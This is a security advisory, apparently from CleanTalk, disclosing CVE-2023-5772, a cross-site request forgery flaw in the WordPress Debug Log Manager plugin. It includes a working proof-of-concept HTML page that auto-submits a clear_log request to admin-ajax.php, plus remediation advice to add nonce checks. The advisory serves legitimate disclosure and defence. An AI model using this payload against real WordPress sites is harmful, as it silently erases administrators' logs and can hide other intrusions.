CVE-2023-5772 – Debug Log Manager – CSRF to clear error logs – POC

While conducting a security assessment of the Debug Log Manager plugin, a CSRF (Cross-Site Request Forgery) vulnerability was identified during testing. This vulnerability allows an attacker to clear PHP logs in the plugin without proper authorization. Specifically, the action=clear_log method is found to be vulnerable. It is recommended that the plugin author implement the wp_nonce check to enhance security.

Main info:

CVE	CVE-2023-5772
Plugin	Debug Log Manager
Critical	High
All Time	12 969
Active installations	2000+
Publicly Published	October 28, 2023
Last Updated	October 28, 2023
Researcher	Dmtirii Ignatyev
OWASP TOP-10	A3: Sensitive Data Exposure
PoC	Yes
Exploit	No
Reference	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5772 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/debug-log-manager/debug-log-manager-220-cross-site-request-forgery
Plugin Security Certification by CleanTalk

Timeline

Discovery of the Vulnerability

During testing, a CSRF vulnerability was discovered, which leads to clearing PHP logs in the plugin. The action=clear_log method is vulnerable. The plugin author needs to implement the wp_nonce check

Understanding of CSRF attack’s

CSRF is a type of attack where a malicious actor tricks a user into performing an unwanted action on a web application in which they are authenticated. In WordPress, CSRF attacks can target various functionalities, including those provided by plugins. In the case of the Debug Log Manager, the CSRF vulnerability allows an attacker to forge a request that, when executed by an authenticated user, triggers the clearing of PHP logs.

Exploiting the CSRF Vulnerability

Exploiting the CSRF vulnerability in the Debug Log Manager involves crafting a malicious web page or script that, when visited by an authenticated user, automatically triggers the action=clear_log method without the user’s knowledge. This can lead to the unintended removal of PHP logs.

POC code :

<html>

  <body>

  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”http://your_site/wordpress/wp-admin/admin-ajax.php”>

      <input type=”hidden” name=”action” value=”clear&#95;log” />

      <input type=”submit” value=”Submit request” />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>

___

The potential risk associated with this CSRF vulnerability is significant. An attacker exploiting this vulnerability could trick an authenticated user, such as an administrator, into unknowingly clearing PHP logs. This can disrupt debugging efforts and potentially lead to the loss of valuable information for diagnosing issues.

In a real-world scenario, an attacker might embed malicious code in a website or send a crafted link to a targeted user. If the targeted user, who has administrative privileges, visits the site or clicks the link while authenticated in the WordPress dashboard, the CSRF attack is executed.

Recommendations for Improved Security

• To address and mitigate the CSRF vulnerability in the Debug Log Manager plugin, the following recommendations are advised:
  
• Implementation of Nonce: The plugin author should implement wp_nonce checks for sensitive actions like clearing logs to prevent CSRF attacks.
• Educate Users: Administrators and users should be educated about the risks of clicking on untrusted links and the importance of logging out from their accounts when not in use.
• Security Audits: Conduct regular security audits to identify and remediate vulnerabilities promptly.

By implementing these security measures, administrators can reduce the risk of CSRF attacks and enhance the overall security of their WordPress environment.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.